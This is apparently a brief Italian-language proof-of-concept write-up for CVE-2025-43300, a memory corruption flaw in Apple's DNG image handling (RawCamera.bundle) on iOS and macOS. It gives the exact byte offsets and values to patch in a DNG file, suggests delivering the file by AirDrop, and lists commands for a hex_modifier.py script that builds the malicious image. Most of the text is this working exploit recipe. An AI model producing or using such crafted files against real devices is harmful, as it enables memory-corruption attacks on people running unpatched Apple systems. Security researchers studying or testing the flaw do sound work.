
CVE-2025-43300: Corruzione della memoria nell'elaborazione delle immagini DNG su iOS/macOS
CVE-2025-43300: Corruzione della memoria nell'elaborazione di immagini DNG su iOS/macOS
Una vulnerabilità nell'elaborazione delle immagini di Apple (RawCamera.bundle) interessa iOS 18.6.1 e macOS. Il problema si verifica quando i file DNG contengono metadati TIFF e parametri JPEG Lossless non corrispondenti, provocando una corruzione della memoria.
Scaricare un'immagine in formato DNG
Modificare i seguenti byte:
0x2FD00: 01 -> 02
0x3E40B: 02 -> 01
Airdrop ecc.
# Create POC using known vulnerable offsets
python3 hex_modifier.py create-poc <input.dng>
# Manual byte modification
python3 hex_modifier.py modify <input.dng> <offset> <old_byte> <new_byte> <output.dng>
# Generate diff report
python3 hex_modifier.py diff <original.dng> <modified.dng>